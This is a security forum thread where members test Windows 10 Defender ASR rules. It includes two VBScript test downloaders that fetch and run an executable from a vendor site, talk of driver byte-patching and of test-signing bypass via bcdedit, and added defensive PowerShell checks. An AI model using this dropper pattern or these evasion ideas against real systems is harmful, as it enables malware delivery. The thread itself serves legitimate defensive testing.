Who has already played with new W10 security features?

Have you enabled and added folders to the secure folder access feature?

  • Yes

    Votes: 27 29.7%
  • No

    Votes: 46 50.5%
  • What ??

    Votes: 18 19.8%

  • Total voters
    91

Av Gurus

Level 29
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Sep 22, 2014
1,767
Thanks. :)
If I correctly read your attachment, then the scripts (RunNotepad.vbs, RunPowerShell.vbs) successfully ran the executables (notepad.exe, powershell.exe), and next, Defender recognized the RunPowerShell.vbs script as dangerous and put it in Quarantine.
If so, then indeed, the executables that are already on the disk are not blocked by this ASR rule (D3E037E1-3EB8-44C8-A917-57927947596D). Your malware test suggests that the rule is activated when the script downloads an executable to the disk and tries to execute it. That is good news.
Anyway, your Defender settings are somewhat more aggressive, because I can run the same script with no Defender intervention.
Could you post the Defender details about the quarantined script (or details from Windows Event Viewer)?
This would help to assure everyone that ASR rules have nothing to do with detecting the RunPowerShell.vbs script.

I can't find anything in WD except what I already posted in the last msg.
In Event Viewer I also can't find anything; maybe you can tell me where to look?

ev.jpg
 
  • Like
Reactions: AtlBo

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,488
Yep, who needs documentation when you can just brute force everything? I have 0 knowledge of what any of the exploit protection settings do; I just enable everything and then disable 1 by 1. Eventually I'll find the settings which are causing an error when you try to start the program, and then I can enable all the other ones, easy as ***, just gotta verify the program works as intended after that. Microsoft should hire me :whistle:
Yes, that is easy for an individual setup. :)
Things may be more complicated when one wants to find the setup for the average user. :(
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,488
I can't find anything in WD except what I already posted in the last msg.
In Event Viewer I also can't find anything; maybe you can tell me where to look?

I assume that you checked EventId=1121 in the Event Viewer, like you did with the malware samples. Because this event was absent, the script was not detected/blocked by ASR rules. Have you activated Advanced Threat Protection?
 
  • Like
Reactions: AtlBo and Av Gurus

Av Gurus

Level 29
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Sep 22, 2014
1,767
All settings are the same as in the test (this is a test PC).
ATP protection, not sure...
 
  • Like
Reactions: AtlBo

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,488
@Av Gurus, please run this script (see also the attachment RunRemoteSumo.txt):
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
WScript.Sleep(10000)
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
The above VBScript is an example of a trojan downloader (not malicious). It uses PowerShell to download sumo_lite.exe from the developer's website, waits 10 seconds and executes sumo_lite.exe. I can run this script successfully despite ASR being activated.
 

Attachments

  • RunRemoteSumo.txt
    373 bytes · Views: 538

Deleted member 65228

@Sunshine-boy The test will be over before you know it. PC Hunter will be able to access any directory from kernel mode, regardless of whether it is protected or not, if it's intentionally trying to bypass such mitigations. The only exception would be byte-patching the PC Hunter driver in memory (which would require the offender to also be executing in kernel mode to access the memory for writing, or to deploy a zero-day exploit for a vulnerability to find a way to change the memory) or intercepting kernel-mode routines in a way that PC Hunter won't be able to surpass without updates to specifically bypass the patch technique.

One exception could be:
1. PC Hunter starts up (the user-mode process).
2. An attacker injects code into the PC Hunter user-mode process.
3. The injected code sets various API hooks but also hides the presence of the hooks by controlling memory read operations and spoofing the bytes which were originally present at the memory of the hooked APIs, to conceal evidence of the targeted functions being patched (similar to how an old banking malware from around 2012, I believe, spoofed the MBR after infecting it, which managed to fool many researchers for a while).
4. When the user attempts to run a scan with PC Hunter by controlling the GUI -> the malicious code forces it to fake a scan instead of actually communicating with its device driver.
5. The user is given fake results; however, since no communication was made to the driver in the first place (although no one is aware of this except the attacker), the protected/hidden directories/files are never touched/found in the first place.

The byte-patching method applied to the driver dynamically would allow you to have your own opcodes executed when targeted stubs are executed in its driver; this could be abused to force-whitelist/force-ignore specific processes, registry keys/registry key values and files.

Bear in mind that all of this is extremely unrealistic, because the attacker would need to have real experience with doing these things, and would need to keep it updated and maintained for updates of the software to keep it working correctly. However, the byte-patch method I have just mentioned reminds me of what the NSA did with the DoublePulsar payload for srv.sys (they found the base address of the driver and then performed a mathematical calculation from the base address to locate the address of a dispatch table (which is basically just an array) which contained pointer addresses, and since they had the ability to change the memory, they did exactly that to control things related to SMB (and thus when the patch was triggered, the malicious code was executed instead of the genuine code beforehand/entirely)). Therefore that is validation that the technique does actually work and can be applied if an attacker knew enough and was determined enough to go to such lengths.

Anyway, you'll just be wasting time trying to see what can outsmart PC Hunter haha. I doubt you'll find anything for protecting directories/files and what-not which won't be surpassed hahaha.
 

Deleted member 65228

Hahahahaha. Sorry, I didn't mean to just shove a ton of info on you like that. Well, basically, to make it easier for you to understand what I mean: the best thing you can do is just try to cut PC Hunter's legs off by blocking the driver installation :)

This is what Avast does to the Process Hacker driver when you have self-protection enabled. Try and open Process Hacker with the driver enabled while Avast SP is enabled and it'll be blocked from driver loading. They did this because they don't like how the PH driver is used to terminate even their own processes. They just cut off the legs by blocking kprocesshacker.sys.
 

Sunshine-boy

Level 28
Verified
Top Poster
Well-known
Apr 1, 2017
1,782
Many thanks. Both Comodo and Eset HIPS will ask about third-party drivers! Better prevent than detect :notworthy: BTW, this story is true if you have doubts about that driver, so you will block it! But if I have a safe and well-known software which bundles a malicious and digitally signed driver then I will allow it, because there is no reason to block it!
 
  • Like
Reactions: AtlBo

Sunshine-boy

Level 28
Verified
Top Poster
Well-known
Apr 1, 2017
1,782
What does that mean? I think the PC Hunter driver is signed, isn't it? Not sure. But it doesn't matter; I just wanted to see if Microsoft can block this ... and Opcode said no, so it can't.
 
  • Like
Reactions: AtlBo

Deleted member 65228

If the driver isn't signed then you'll have to enable Test Mode (and then reboot) or go into boot options and disable verification enforcement for that one boot session. Whereas Test Mode keeps it enabled permanently until you disable it and then reboot. I am surprised that malware hasn't yet abused this in the wild (I don't think it has yet, at least) by just spawning bcdedit.exe with the correct arguments to disable TESTSIGNING -> unsigned driver starts at boot early due to boot group order -> bam, now you get hit with a crazy kernel-mode ransomware payload LOL. Unrealistic, I am just kidding hahaha

Don't enable Test Mode though unless you are aware of the security risks and know what you're doing, because it will leave you in a more vulnerable scenario.
 

Av Gurus

Level 29
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Sep 22, 2014
1,767
@Av Gurus, please run this script (see also the attachment RunRemoteSumo.txt):
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
WScript.Sleep(10000)
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
The above VBScript is an example of a trojan downloader (not malicious). It uses PowerShell to download sumo_lite.exe from the developer's website, waits 10 seconds and executes sumo_lite.exe. I can run this script successfully despite ASR being activated.

I will try when I come back home... about 22h... if not, then tomorrow...
 
  • Like
Reactions: AtlBo and Andy Ful

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,488
What does that mean? I think the PC Hunter driver is signed, isn't it? Not sure. But it doesn't matter; I just wanted to see if Microsoft can block this ... and Opcode said no, so it can't.
Did you run PC Hunter on your computer? I used it on Windows 8.1 - it is very powerful, as Opcode said. If I remember correctly, it uses a mini-filter driver (a kernel-mode driver).
There are many versions of PC Hunter, some are signed by 'WoSign eCommerce Services Limited', some not.
https://www.reasoncoresecurity.com/pchunter64.exe-50397414d48b461dd80055accc70d6edb6169d7a.aspx
I did not see the version signed by Microsoft, so the driver will not be loaded due to Signed Driver Enforcement.
It could work in early Windows 10 versions.
 
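An added example (not code from the thread or from any of the tools it mentions) that puts the two points above into a check a defender can run: whether the machine is in Test Mode, which is what relaxes Driver Signature Enforcement, and who actually signed a given driver file. The driver path is a placeholder; `bcdedit` needs an elevated prompt, and the "Microsoft" subject match is a heuristic I chose, not an official test.

```powershell
# Added example, not from the thread. Reports Test Mode state and the
# Authenticode signer of a driver file so that "is it signed?" can be
# answered before the driver is allowed to load.
# Run in an elevated PowerShell: bcdedit refuses to read the BCD store otherwise.

function Get-TestSigningState {
    # bcdedit prints a "testsigning  Yes" line only when Test Mode is on.
    $lines = bcdedit /enum '{current}' 2>$null
    if (-not $lines) { return 'unknown (run elevated)' }
    if ($lines -match '^testsigning\s+Yes') { 'ON (unsigned drivers may load)' } else { 'off' }
}

function Get-DriverSignatureReport {
    param([Parameter(Mandatory)][string]$Path)
    $sig = Get-AuthenticodeSignature -FilePath $Path
    $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<none>' }
    [pscustomobject]@{
        File   = Split-Path -Leaf $Path
        Status = $sig.Status        # Valid, NotSigned, HashMismatch, UnknownError, ...
        Signer = $signer
        # Heuristic (my assumption): Windows 10 kernel drivers need a Microsoft-issued
        # (WHQL/attestation) signature, so a chain from a third-party CA alone is not enough.
        LooksMicrosoftSigned = [bool]($signer -match 'Microsoft')
    }
}

"Test Mode: $(Get-TestSigningState)"
$DriverPath = 'C:\path\to\driver.sys'   # placeholder: point this at the .sys you want to inspect
if (Test-Path $DriverPath) { Get-DriverSignatureReport -Path $DriverPath | Format-List }
else { "Driver file not found: $DriverPath" }
```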

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,488
I tested another trojan downloader (not malicious) against ASR.
Code:
dim mXMLHTTP: Set mXMLHTTP = CreateObject("Microsoft.XMLHTTP")
dim aStream: Set aStream = CreateObject("Adodb.Stream")
mXMLHTTP.Open "GET", "https://kcsoftwares.com/files/sumo_lite.exe", False
mXMLHTTP.Send
with aStream
    .type = 1 '//binary
    .open
    .write mXMLHTTP.ResponseBody
    .savetofile "C:\Users\Public\Downloads\sumo_lite.exe", 2 '//overwrite
end with
WScript.Sleep(10000)
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
This is functionally the same script as in my previous post (Poll - Who has already played with new W10 security features?), but without using PowerShell; the XMLHTTP and ADODB.Stream objects were used instead.
After I created the above script it was quarantined by Defender. So, I restored it from the Quarantine and tried to run it. This time the script was stopped by ASR rule D3E037E1-3EB8-44C8-A917-57927947596D. :)
 
  • Like
Reactions: AtlBo and Av Gurus
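An added example (not from the thread) for the two questions raised above: is the ASR rule Andy Ful names actually configured on the test machine, and where do the 1121 events he refers to live? The cmdlet properties and event IDs are Microsoft's documented ones (1121 = rule fired in Block mode, 1122 = in Audit mode); the helper functions and their output format are mine.

```powershell
# Added example, not from the thread. Reports the configured mode of the ASR rule
# discussed above and lists the Windows Defender events written when any ASR rule
# fires. Those events sit in the Defender operational log, not in the System or
# Application logs, which is why a plain Event Viewer search does not show them.
$RuleId = 'D3E037E1-3EB8-44C8-A917-57927947596D'   # rule named in the thread

function Get-AsrRuleState {
    param([string]$Id)
    # Ids and Actions are parallel arrays; 0 = Disabled, 1 = Block, 2 = Audit, 6 = Warn.
    $pref    = Get-MpPreference
    $ids     = @($pref.AttackSurfaceReductionRules_Ids)
    $actions = @($pref.AttackSurfaceReductionRules_Actions)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        if ($ids[$i] -ieq $Id) {          # GUIDs may be stored in either case
            switch ([int]$actions[$i]) {
                0 { return 'Disabled' }
                1 { return 'Block' }
                2 { return 'Audit' }
                6 { return 'Warn' }
                default { return "Unknown action $_" }
            }
        }
    }
    return 'Not configured (rule never set, so it cannot fire)'
}

function Get-AsrEvents {
    param([string]$Id, [int]$Max = 50)
    $filter = @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 1121, 1122 }
    # Get-WinEvent reports an error when nothing matches; treat that as "no events".
    $events = Get-WinEvent -FilterHashtable $filter -MaxEvents $Max -ErrorAction SilentlyContinue
    foreach ($e in $events) {
        # Keep only events whose message names the rule we care about.
        if ($Id -and $e.Message -notmatch [regex]::Escape($Id)) { continue }
        [pscustomobject]@{
            Time   = $e.TimeCreated
            Mode   = if ($e.Id -eq 1121) { 'BLOCK' } else { 'AUDIT' }
            # The message carries the rule GUID, the initiating process and the target file.
            Detail = ($e.Message -replace '\s+', ' ')
        }
    }
}

"ASR rule $RuleId is: $(Get-AsrRuleState -Id $RuleId)"
$hits = @(Get-AsrEvents -Id $RuleId)
if ($hits.Count -eq 0) { "No 1121/1122 events for this rule: it did not fire." }
else { $hits | Format-Table -Wrap }
```

A Defender quarantine of the .vbs file itself shows up as a different event (a malware detection), so an empty result here together with a quarantine entry is consistent with what Av Gurus observed.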

Av Gurus

Level 29
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
Sep 22, 2014
1,767
@Av Gurus, please run this script (see also the attachment RunRemoteSumo.txt):
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
WScript.Sleep(10000)
WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
WScript.Quit
The above VBScript is an example of a trojan downloader (not malicious). It uses PowerShell to download sumo_lite.exe from the developer's website, waits 10 seconds and executes sumo_lite.exe. I can run this script successfully despite ASR being activated.

Here is the test.
I ran that .vbs and WDSC blocked & quarantined the file, but I can't find anything in EV for ASR.
Here are pictures:

1.jpg 2.jpg
 
  • Like
Reactions: AtlBo
